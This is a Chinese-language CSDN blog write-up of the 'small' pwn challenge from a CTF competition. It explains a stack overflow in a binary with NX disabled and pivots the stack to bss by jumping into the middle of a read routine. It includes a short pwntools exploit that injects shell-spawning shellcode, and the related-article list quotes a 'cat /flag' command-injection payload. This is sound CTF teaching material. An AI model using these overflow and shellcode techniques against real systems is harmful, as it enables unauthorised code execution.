第六届全国网络空间安全技术大赛 pwn small

最新推荐文章于 2021-05-27 18:57:02 发布
最新推荐文章于 2021-05-27 18:57:02 发布
阅读量240 收藏
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/116465329
版权

在这里插入图片描述保护的话重点你会发现没有NX。

程序的话确实,非常的小。
在这里插入图片描述主函数,调用另外一个函数然后退出。

在这里插入图片描述另外一个函数就是开了一个缓冲区,大小是0x10,然后读,能读0x400,有个绝对大的溢出。

这个题关键的是,怎么根据那些已经给了的条件去做一个利用。
首先我们看到没有开NX,那么我们想到说去执行一些shellcode,我们想到栈迁移。

这个地方的栈迁移与以前的不一样,我们说栈迁移有两种,一种迁移到bss上,一种迁移到栈上,迁移到bss上需要我们能够事先在bss上写东西,栈上需要我们能够泄露栈地址。然后我们两种情况都需要一个leave|ret。

这个题我们泄露不了栈的地址,只能说思考这个bss,bss上我们我们要么读,要么leave,那么我们怎么整?

跟平常的题不一样的是,以前read是现成函数,这里是汇编直接写的,那么我们可以把read从中间用,那么我们就不用去开那个read的栈,就会多一个leave|ret,所以我们就会发现,只要把地址写read中间,然后就会read,leabve|ret都有,所以就解决了这个问题。

要注意的就是在往bss上迁移的时候要注意ebp覆盖不要直接覆盖bss,要有一点空余,因为我们在写的时候需要往bss上面写一点,如果那一块不可写,或者有什么关键数据,就会出问题,所以我们迁移的时候往bss下面一点,就好了。

exp

from pwn import*

context.log_level = "debug"
context.arch = "amd64"

shellcode = asm(shellcraft.sh())

r = process("./small")

payload = 'a' * 0x10 + p64(0x402050) + p64(0x401015)
r.sendline(payload)

payload = 'a' * 0x10 + p64(0x402050) + p64(0x402060) + shellcode
r.sendline(payload)

r.interactive()
yongbaoii
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2024第八届全国职工职业技能大赛“网络与信息安全管理员”河北省预选拔赛解析
Aluxian_的博客
08-03 602
2024第八届全国职工职业技能大赛“网络与信息安全管理员”某省选拔赛解析
2020第五空间智能安全大赛PWN——twice
baidu_36110484的博客
06-30 820
0x00背景 这次比赛中的一道pwn题,主要考察了栈迁移和泄露canary。之前没有接触过栈迁移,所以当时没有做出来(好多人都做出来了,捂脸)。 没办法,菜鸡只能赛后复盘。注:虚拟机环境使用的动态库为kali的libc-2.30.so 0x01源码分析 主要代码逻辑如下,main函数之后可以进行两次输入,然后将输入的字符串打印出来。第一次输入可以溢出一个字节,用于泄露canary和栈地址(用于之后的栈迁移),第二次输入可以溢出到返回地址,修改程序流程完成栈迁移,从而执行ROP链。 0x02 exp构造 需
全国网络空间安全竞赛试题
06-22
网络空间安全试题类型、近年的竞赛状况、各省队的情况
第六届全国网络空间安全技术大赛 pwn bank
yongbaoii的博客
05-05 595
保护还算正常 需要绕过strcmp的检查 然后下面会把flag读到一个chunk中,地址在栈里面,我们可以通过格式化字符串来将它输出。 可以试一下地址的偏移是8,重点是上面怎么去绕过strcmp。 很简单的,我们可以通过’\x00’ 但是问题是这道题输入是fgets,输入的时候必带回车,我们不能单输一个’\x00’,必然会有回车,所以我们只能是去爆破,password第一个数字等于我们的回车,就可以进入利用。 exp from pwn import* context.log_level = "debug
2018 年(第四届)全国网络空间安全大赛 线上赛解题报告
04-27
2018 年(第四届)全国网络空间安全大赛 线上赛解题报告 主办单位:中国兵工学会信息安全与对抗技术专业委员会 承办单位:西安工业大学 协办单位:西安胡门网络技术有限公司
第六届全国网络安全技术大赛
qq_53086690的博客
05-06 886
一道RSA题 from gmpy2 import * import random def generatePQ(): st = random_state() p = int(mpz_urandomb(st, 2048)) q = int(mpz_urandomb(st, 2048)) while((is_prime(p, 50) and is_prime(q, 50)) == False): p = int(next_prime(p)) q
第六届全国网络空间安全技术大赛 pwn auto
yongbaoii的博客
05-06 700
保护正常。 main函数过大,肯定不是都有用,所以我们进来得一点一点看汇编。 第一块是设置缓冲区 这个是把var_C设置为19.通过循环的方式。 栈一个变量里面写了几个字母,然后正常输出输入。之后跳走。 要注意s2是UCIJEURI 这个函数要跑七次,作用是通过complex_function函数把我们的输入进行一个加密。 继续读main函数。 把我们输入的字符串地址防到eax,然后加1. 两个movzx作用是将输入的第二个字符取出来,因为上面加了个1。 与10h做了与运算,结果保留在eax中,然后tes
【天格】战队-未解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中分享了多个未解出的题目附件,这些附件涵盖了网络安全领域的多个子领域,包括逆向工程、漏洞利用(PWN)、密码学(Crypto)以及杂项(Misc)。通过分析这些文件...
2020年第六届“湖湘杯”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛.zip
11-01
【标题】: 2020年第六届“湖湘杯”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛 【描述】: 这个压缩包文件包含了2020年第六届“湖湘杯”网络安全技能大赛洞庭决赛中,互联网选拔赛第二场的线上CTF...
全国网络与信息安全管理职业技能大赛2020年题库
09-30
以上知识点涵盖了网络与信息安全管理大赛可能涉及的重要内容,包括网络协议、标准化、网络体系结构、网络安全法规、内容安全、营业场所安全,以及计算机网络的基本概念和通信技术。这些知识对于理解和处理网络安全...
2021年第六届全国网络空间安全技术大赛 web easyweb
Sk1y的博客
05-27 1214
php数组绕过,%00进行截断
2019全国大学生信息安全竞赛初赛pwn前四题writeup—栈部分
weixin_33736649的博客
04-28 427
ret to libc技巧:https://blog.csdn.net/zh_explorer/article/details/80306965 如何leak出libc地址:基地址+函数在libc中的偏移地址=函数真实地址 1.已知libc,函数地址-函数在libc中的地址=基地址 2.不知道libc,就要leak出libc中的两个函数 转载于:https://www.cnblogs.com...
第四届山东省网络安全技能大赛 write up
熹微晨光的博客
11-05 3306
第一题:下载下来并解压后发现是一个没有后缀名字的文件  很简单了  第一步想到右键查看发现乱码以MZ开头  ok  好吧  .exe文件  改完之后就能运行了  不过无法得到key  继续看源代码  ctrl+f查找Key关键字  发现了一串字符串 “.anyuntec.com”   好吧  脑洞题  安云的网址  www.anyuntec.com  ok  得到了  KEY{iimmq
广西首届网络安全选拔赛PWN、REVERSE、决赛题目
热门推荐
zrools的博客
02-03 1万+
逆向和溢出没太多研究(无flag的为未解出),这两类和决赛题目放一起以减少篇幅!溢出类(PWN) PWN 在黑客俚语中代表着,攻破,取得权限,在CTF中它代表着溢出类的题目。 高水平溢出 分值:500 附件:55ed7cb0866ec 靶机:192.168.43.84 小张由于电脑被入侵,下场很惨,于是专心学习溢出,只是没想到从网上经过别人指点找到这个东东,完全不知道是什么。当时小张就瞬间蒙逼了
第四届全国网络空间安全技术大赛部分 Writeup
柠檬木有枝
10-21 1491
Web1 首先是一个登录注册界面,注册登录进去后提示 flag 在 flag.php。 访问 flag.php 提示 admin can get the flag 发现一个修改密码的页面 change_passwd.php ,根据 cookie 中的 user 确定修改密码的用户,造成任意密码修改漏洞(大佬们还写了脚本更改 admin的密码,这道题还是一个拼手速的游戏
CTF--2015中国西安电子科技大学XDCTF网络安全大赛pwn
关注互联网安全的小虾米一枚
09-19 4510
write up 0x01 基本信息 本人初学,可能本题解答对大神来说,有些繁琐。(大神可以忽略飘过)。 分享在此,方便自己,也方便他人。 文件: xd_jwxt 大小: 8276 字节 修改时间: 2016年7月13日, 16:22:24 MD5: 07BE390A9328A365549A27D400462B59 SHA1: C0175B97E12670373
2021数字中国创新大赛虎符网络安全赛-Writeup
末初的CSDN博客
04-04 4857
文章目录Web签到unsetme“慢慢做”管理系统Misc你会日志分析吗sectraffic Web 签到 http://cn-sec.com/archives/313267.html User-Agentt: zerodiumsystem("cat /flag"); unsetme 这题先放着 /?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27); “慢慢做”管理系统 根据题目提示,这里第一步登录应该利用一些字符串被md5
CTF--2016湖湘杯全国网络安全技能大赛之栈溢出pwnme
关注互联网安全的小虾米一枚
03-30 6555
0x01 基础知识 本题目考察逆向分析,漏洞挖掘以及利用能力。 学习本篇技术,提前储备好栈溢出相关知识。 关键技术点 scanf函数溢出漏洞 0x02 基本分析 拿到题目先对其进行基本分析,使用工具checksec.sh脚本检测。 根据这个判断程序运行在32位系统之上。没有开启canary和nx保护。 猜测题目考察内容多为溢出漏洞。运行程序
全国工业互联网安全大赛:CTF视角的技能考核
"全国工业互联网安全大赛是一场旨在考察参赛者在网络安全,特别是工业互联网安全领域的理论知识和实践技能的比赛。比赛涵盖了WEB安全PWN、REVERSE、CRYPTO和MISC五大类题目,涉及AI、区块链、5G、密码学、渗透测试...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值